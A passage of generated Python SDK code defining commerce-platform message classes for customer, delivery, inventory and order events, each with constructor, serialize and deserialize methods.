return CustomerCreatedMessageSchema().dump(self)
class CustomerDateOfBirthSetMessage(Message):
date_of_birth: datetime.date
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
date_of_birth: datetime.date
):
self.date_of_birth = date_of_birth
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerDateOfBirthSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerDateOfBirthSetMessage":
from ._schemas.message import CustomerDateOfBirthSetMessageSchema
return CustomerDateOfBirthSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerDateOfBirthSetMessageSchema
return CustomerDateOfBirthSetMessageSchema().dump(self)
class CustomerEmailChangedMessage(Message):
email: str
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
email: str
):
self.email = email
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerEmailChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerEmailChangedMessage":
from ._schemas.message import CustomerEmailChangedMessageSchema
return CustomerEmailChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerEmailChangedMessageSchema
return CustomerEmailChangedMessageSchema().dump(self)
class CustomerEmailVerifiedMessage(Message):
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None
):
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerEmailVerified",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerEmailVerifiedMessage":
from ._schemas.message import CustomerEmailVerifiedMessageSchema
return CustomerEmailVerifiedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerEmailVerifiedMessageSchema
return CustomerEmailVerifiedMessageSchema().dump(self)
class CustomerGroupSetMessage(Message):
customer_group: "CustomerGroupReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
customer_group: "CustomerGroupReference"
):
self.customer_group = customer_group
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerGroupSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerGroupSetMessage":
from ._schemas.message import CustomerGroupSetMessageSchema
return CustomerGroupSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerGroupSetMessageSchema
return CustomerGroupSetMessageSchema().dump(self)
class CustomerPasswordUpdatedMessage(Message):
#: true, if password has been updated during Customer's Password Reset workflow.
reset: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
reset: bool
):
self.reset = reset
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerPasswordUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerPasswordUpdatedMessage":
from ._schemas.message import CustomerPasswordUpdatedMessageSchema
return CustomerPasswordUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerPasswordUpdatedMessageSchema
return CustomerPasswordUpdatedMessageSchema().dump(self)
class DeliveryAddedMessage(Message):
delivery: "Delivery"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery: "Delivery"
):
self.delivery = delivery
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="DeliveryAdded",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "DeliveryAddedMessage":
from ._schemas.message import DeliveryAddedMessageSchema
return DeliveryAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryAddedMessageSchema
return DeliveryAddedMessageSchema().dump(self)
class DeliveryAddressSetMessage(Message):
delivery_id: str
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.delivery_id = delivery_id
self.address = address
self.old_address = old_address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="DeliveryAddressSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryAddressSetMessage":
from ._schemas.message import DeliveryAddressSetMessageSchema
return DeliveryAddressSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryAddressSetMessageSchema
return DeliveryAddressSetMessageSchema().dump(self)
class DeliveryItemsUpdatedMessage(Message):
delivery_id: str
items: typing.List["DeliveryItem"]
old_items: typing.List["DeliveryItem"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
items: typing.List["DeliveryItem"],
old_items: typing.List["DeliveryItem"]
):
self.delivery_id = delivery_id
self.items = items
self.old_items = old_items
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="DeliveryItemsUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryItemsUpdatedMessage":
from ._schemas.message import DeliveryItemsUpdatedMessageSchema
return DeliveryItemsUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryItemsUpdatedMessageSchema
return DeliveryItemsUpdatedMessageSchema().dump(self)
class DeliveryRemovedMessage(Message):
delivery: "Delivery"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery: "Delivery"
):
self.delivery = delivery
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="DeliveryRemoved",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryRemovedMessage":
from ._schemas.message import DeliveryRemovedMessageSchema
return DeliveryRemovedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryRemovedMessageSchema
return DeliveryRemovedMessageSchema().dump(self)
class InventoryEntryCreatedMessage(Message):
inventory_entry: "InventoryEntry"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
inventory_entry: "InventoryEntry"
):
self.inventory_entry = inventory_entry
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="InventoryEntryCreated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryCreatedMessage":
from ._schemas.message import InventoryEntryCreatedMessageSchema
return InventoryEntryCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryCreatedMessageSchema
return InventoryEntryCreatedMessageSchema().dump(self)
class InventoryEntryDeletedMessage(Message):
sku: str
supply_channel: "ChannelReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
sku: str,
supply_channel: "ChannelReference"
):
self.sku = sku
self.supply_channel = supply_channel
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="InventoryEntryDeleted",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryDeletedMessage":
from ._schemas.message import InventoryEntryDeletedMessageSchema
return InventoryEntryDeletedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryDeletedMessageSchema
return InventoryEntryDeletedMessageSchema().dump(self)
class InventoryEntryQuantitySetMessage(Message):
old_quantity_on_stock: int
new_quantity_on_stock: int
old_available_quantity: int
new_available_quantity: int
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
old_quantity_on_stock: int,
new_quantity_on_stock: int,
old_available_quantity: int,
new_available_quantity: int
):
self.old_quantity_on_stock = old_quantity_on_stock
self.new_quantity_on_stock = new_quantity_on_stock
self.old_available_quantity = old_available_quantity
self.new_available_quantity = new_available_quantity
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="InventoryEntryQuantitySet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryQuantitySetMessage":
from ._schemas.message import InventoryEntryQuantitySetMessageSchema
return InventoryEntryQuantitySetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryQuantitySetMessageSchema
return InventoryEntryQuantitySetMessageSchema().dump(self)
class LineItemStateTransitionMessage(Message):
line_item_id: str
transition_date: datetime.datetime
quantity: int
from_state: "StateReference"
to_state: "StateReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
line_item_id: str,
transition_date: datetime.datetime,
quantity: int,
from_state: "StateReference",
to_state: "StateReference"
):
self.line_item_id = line_item_id
self.transition_date = transition_date
self.quantity = quantity
self.from_state = from_state
self.to_state = to_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="LineItemStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "LineItemStateTransitionMessage":
from ._schemas.message import LineItemStateTransitionMessageSchema
return LineItemStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import LineItemStateTransitionMessageSchema
return LineItemStateTransitionMessageSchema().dump(self)
class MessageConfiguration(_BaseType):
enabled: bool
delete_days_after_creation: typing.Optional[int]
def __init__(
self, *, enabled: bool, delete_days_after_creation: typing.Optional[int] = None
):
self.enabled = enabled
self.delete_days_after_creation = delete_days_after_creation
super().__init__()
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "MessageConfiguration":
from ._schemas.message import MessageConfigurationSchema
return MessageConfigurationSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessageConfigurationSchema
return MessageConfigurationSchema().dump(self)
class MessageConfigurationDraft(_BaseType):
enabled: bool
delete_days_after_creation: int
def __init__(self, *, enabled: bool, delete_days_after_creation: int):
self.enabled = enabled
self.delete_days_after_creation = delete_days_after_creation
super().__init__()
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "MessageConfigurationDraft":
from ._schemas.message import MessageConfigurationDraftSchema
return MessageConfigurationDraftSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessageConfigurationDraftSchema
return MessageConfigurationDraftSchema().dump(self)
class MessagePagedQueryResponse(_BaseType):
limit: int
count: int
total: typing.Optional[int]
offset: int
results: typing.List["Message"]
def __init__(
self,
*,
limit: int,
count: int,
total: typing.Optional[int] = None,
offset: int,
results: typing.List["Message"]
):
self.limit = limit
self.count = count
self.total = total
self.offset = offset
self.results = results
super().__init__()
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "MessagePagedQueryResponse":
from ._schemas.message import MessagePagedQueryResponseSchema
return MessagePagedQueryResponseSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessagePagedQueryResponseSchema
return MessagePagedQueryResponseSchema().dump(self)
class OrderBillingAddressSetMessage(Message):
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.address = address
self.old_address = old_address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderBillingAddressSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderBillingAddressSetMessage":
from ._schemas.message import OrderBillingAddressSetMessageSchema
return OrderBillingAddressSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderBillingAddressSetMessageSchema
return OrderBillingAddressSetMessageSchema().dump(self)
class OrderCreatedMessage(Message):
order: "Order"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
order: "Order"
):
self.order = order
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCreated",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "OrderCreatedMessage":
from ._schemas.message import OrderCreatedMessageSchema
return OrderCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCreatedMessageSchema
return OrderCreatedMessageSchema().dump(self)
class OrderCustomLineItemDiscountSetMessage(Message):
custom_line_item_id: str
discounted_price_per_quantity: typing.List["DiscountedLineItemPriceForQuantity"]
taxed_price: typing.Optional["TaxedItemPrice"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
custom_line_item_id: str,
discounted_price_per_quantity: typing.List[
"DiscountedLineItemPriceForQuantity"
],
taxed_price: typing.Optional["TaxedItemPrice"] = None
):
self.custom_line_item_id = custom_line_item_id
self.discounted_price_per_quantity = discounted_price_per_quantity
self.taxed_price = taxed_price
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCustomLineItemDiscountSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomLineItemDiscountSetMessage":
from ._schemas.message import OrderCustomLineItemDiscountSetMessageSchema
return OrderCustomLineItemDiscountSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomLineItemDiscountSetMessageSchema
return OrderCustomLineItemDiscountSetMessageSchema().dump(self)
class OrderCustomerEmailSetMessage(Message):
email: typing.Optional[str]
old_email: typing.Optional[str]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
email: typing.Optional[str] = None,
old_email: typing.Optional[str] = None
):
self.email = email
self.old_email = old_email
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCustomerEmailSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerEmailSetMessage":
from ._schemas.message import OrderCustomerEmailSetMessageSchema
return OrderCustomerEmailSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerEmailSetMessageSchema
return OrderCustomerEmailSetMessageSchema().dump(self)
class OrderCustomerGroupSetMessage(Message):
customer_group: typing.Optional["CustomerGroupReference"]
old_customer_group: typing.Optional["CustomerGroupReference"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
customer_group: typing.Optional["CustomerGroupReference"] = None,
old_customer_group: typing.Optional["CustomerGroupReference"] = None
):
self.customer_group = customer_group
self.old_customer_group = old_customer_group
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCustomerGroupSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerGroupSetMessage":
from ._schemas.message import OrderCustomerGroupSetMessageSchema
return OrderCustomerGroupSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerGroupSetMessageSchema
return OrderCustomerGroupSetMessageSchema().dump(self)
class OrderCustomerSetMessage(Message):
customer: typing.Optional["CustomerReference"]
customer_group: typing.Optional["CustomerGroupReference"]
old_customer: typing.Optional["CustomerReference"]
old_customer_group: typing.Optional["CustomerGroupReference"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
customer: typing.Optional["CustomerReference"] = None,
customer_group: typing.Optional["CustomerGroupReference"] = None,
old_customer: typing.Optional["CustomerReference"] = None,
old_customer_group: typing.Optional["CustomerGroupReference"] = None
):
self.customer = customer
self.customer_group = customer_group
self.old_customer = old_customer
self.old_customer_group = old_customer_group
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCustomerSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerSetMessage":
from ._schemas.message import OrderCustomerSetMessageSchema
return OrderCustomerSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerSetMessageSchema
return OrderCustomerSetMessageSchema().dump(self)
class OrderDeletedMessage(Message):
order: "Order"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
order: "Order"
):
self.order = order
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderDeleted",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "OrderDeletedMessage":
from ._schemas.message import OrderDeletedMessageSchema
return OrderDeletedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDeletedMessageSchema
return OrderDeletedMessageSchema().dump(self)
class OrderDiscountCodeAddedMessage(Message):
discount_code: "DiscountCodeReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
discount_code: "DiscountCodeReference"
):
self.discount_code = discount_code
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderDiscountCodeAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeAddedMessage":
from ._schemas.message import OrderDiscountCodeAddedMessageSchema
return OrderDiscountCodeAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeAddedMessageSchema
return OrderDiscountCodeAddedMessageSchema().dump(self)
class OrderDiscountCodeRemovedMessage(Message):
discount_code: "DiscountCodeReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
discount_code: "DiscountCodeReference"
):
self.discount_code = discount_code
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderDiscountCodeRemoved",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeRemovedMessage":
from ._schemas.message import OrderDiscountCodeRemovedMessageSchema
return OrderDiscountCodeRemovedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeRemovedMessageSchema
return OrderDiscountCodeRemovedMessageSchema().dump(self)
class OrderDiscountCodeStateSetMessage(Message):
discount_code: "DiscountCodeReference"
state: "DiscountCodeState"
old_state: typing.Optional["DiscountCodeState"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
discount_code: "DiscountCodeReference",
state: "DiscountCodeState",
old_state: typing.Optional["DiscountCodeState"] = None
):
self.discount_code = discount_code
self.state = state
self.old_state = old_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderDiscountCodeStateSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeStateSetMessage":
from ._schemas.message import OrderDiscountCodeStateSetMessageSchema
return OrderDiscountCodeStateSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeStateSetMessageSchema
return OrderDiscountCodeStateSetMessageSchema().dump(self)
class OrderEditAppliedMessage(Message):
edit: "OrderEditReference"
result: "OrderEditApplied"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
edit: "OrderEditReference",
result: "OrderEditApplied"
):
self.edit = edit
self.result = result
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
